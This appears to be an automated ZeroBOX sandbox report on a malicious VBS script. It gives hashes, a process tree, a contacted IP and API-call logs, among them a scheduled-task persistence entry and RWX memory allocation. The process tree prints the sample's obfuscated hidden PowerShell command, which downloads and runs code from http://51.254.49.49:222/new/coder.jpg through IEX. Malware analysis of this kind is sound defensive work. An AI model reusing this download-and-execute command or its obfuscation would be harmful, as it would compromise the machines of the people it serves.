Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Aug. 25, 2023, 9:27 a.m.	Aug. 25, 2023, 9:29 a.m.

Size	2.0KB
Type	ASCII text, with CRLF line terminators
MD5	`6be764247e9a823518f1a4abad4dd12e`
SHA256	`6b98cc6fe746487a866acebca32ef962aefc9f12e156a3b04a4fd5b7b7d1cf0e`
CRC32	`BE05C0AA`
ssdeep	`24:4eVoc9PbQcyggE/Gw5OyGaMrgXHNgm6Jf/xcchQQh2wqaAkqr7:4eWc9brhGwBzO/F/g`
Yara	Antivirus - Contains references to security software

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\gen.txt.vbs
1344
- cmd.exe "C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://51.254.49.49:222/new/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
  2144
  - powershell.exe POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://51.254.49.49:222/new/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
    2228

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
51.254.49.49	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 25, 2023, 9:27 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 25, 2023, 9:27 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 25, 2023, 9:27 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 25, 2023, 9:27 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 25, 2023, 9:27 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 25, 2023, 9:27 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 25, 2023, 9:27 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 25, 2023, 9:27 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 25, 2023, 9:27 a.m.			0	0

Command line console output was observed (50 out of 75 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: IsPublic IsSerial Name BaseType console_handle: 0x0000001b	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: True True Byte[] System.Array console_handle: 0x00000023	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: True True Byte[] System.Array console_handle: 0x00000027	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: True True Byte[] System.Array console_handle: 0x0000002b	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: The term 'ï»¿$Content' is not recognized as the name of a cmdlet, function, scr console_handle: 0x00000023	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: ipt file, or operable program. Check the spelling of the name, or if a path was console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: At line:1 char:12 console_handle: 0x00000047	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: + ï»¿$Content <<<< = @' console_handle: 0x00000053	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: + CategoryInfo : ObjectNotFound: (ï»¿$Content:String) [], Command console_handle: 0x0000005f	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: NotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: Name : MicrosoftEdgeUpdate console_handle: 0x0000008f	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: Path : \MicrosoftEdgeUpdate console_handle: 0x00000093	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: State : 3 console_handle: 0x00000097	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: Enabled : True console_handle: 0x0000009b	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: LastRunTime : 1899-12-30 오전 12:00:00 console_handle: 0x0000009f	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: LastTaskResult : 1 console_handle: 0x000000a3	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: NumberOfMissedRuns : 0 console_handle: 0x000000a7	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: NextRunTime : 2023-08-25 오후 1:49:25 console_handle: 0x000000ab	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: Definition : System.__ComObject console_handle: 0x000000af	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: Xml : <?xml version="1.0" encoding="UTF-16"?> console_handle: 0x000000b3	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: <Task version="1.2" xmlns="http://schemas.microsoft.com/wi console_handle: 0x000000b7	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: ndows/2004/02/mit/task"> console_handle: 0x000000bb	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: <RegistrationInfo> console_handle: 0x000000bf	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: <Description>Runs a script every 2 minutes</Descriptio console_handle: 0x000000c3	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: n> console_handle: 0x000000c7	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: </RegistrationInfo> console_handle: 0x000000cb	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: <Triggers> console_handle: 0x000000cf	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: <TimeTrigger> console_handle: 0x000000d3	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: <Repetition> console_handle: 0x000000d7	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: <Interval>PT2M</Interval> console_handle: 0x000000db	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: <StopAtDurationEnd>false</StopAtDurationEnd> console_handle: 0x000000df	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: </Repetition> console_handle: 0x000000e3	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: <StartBoundary>2023-08-25T13:47:25</StartBoundary> console_handle: 0x000000e7	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: <Enabled>true</Enabled> console_handle: 0x000000eb	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: </TimeTrigger> console_handle: 0x000000ef	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: </Triggers> console_handle: 0x000000f3	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: <Settings> console_handle: 0x000000f7	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesP console_handle: 0x000000fb	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: olicy> console_handle: 0x000000ff	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: <DisallowStartIfOnBatteries>false</DisallowStartIfOnBa console_handle: 0x00000103	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: tteries> console_handle: 0x00000107	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> console_handle: 0x0000010b	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: <AllowHardTerminate>true</AllowHardTerminate> console_handle: 0x0000010f	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: <StartWhenAvailable>false</StartWhenAvailable> console_handle: 0x00000113	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvai console_handle: 0x00000117	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: lable> console_handle: 0x0000011b	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: <IdleSettings> console_handle: 0x0000011f	1	1
WriteConsoleW Aug. 25, 2023, 9:27 a.m.	buffer: <Duration>PT10M</Duration> console_handle: 0x00000123	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003690b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003691f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003691f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003691f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003689f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003689f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003689f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003689f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003689f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003689f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003691f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003691f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003691f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369778 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369778 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369778 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369478 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369778 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369778 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369778 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369778 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369778 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369778 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369778 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003695b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003695b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003694b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003694b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003694b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003694b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003694b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 25, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003694b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 25, 2023, 9:27 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (50 out of 158 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 1638400 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02830000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72681000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72682000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02831000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02832000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02517000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02502000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02515000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02503000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02504000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02505000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02506000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02507000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02508000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02509000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e13000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e14000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e15000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e16000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e17000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
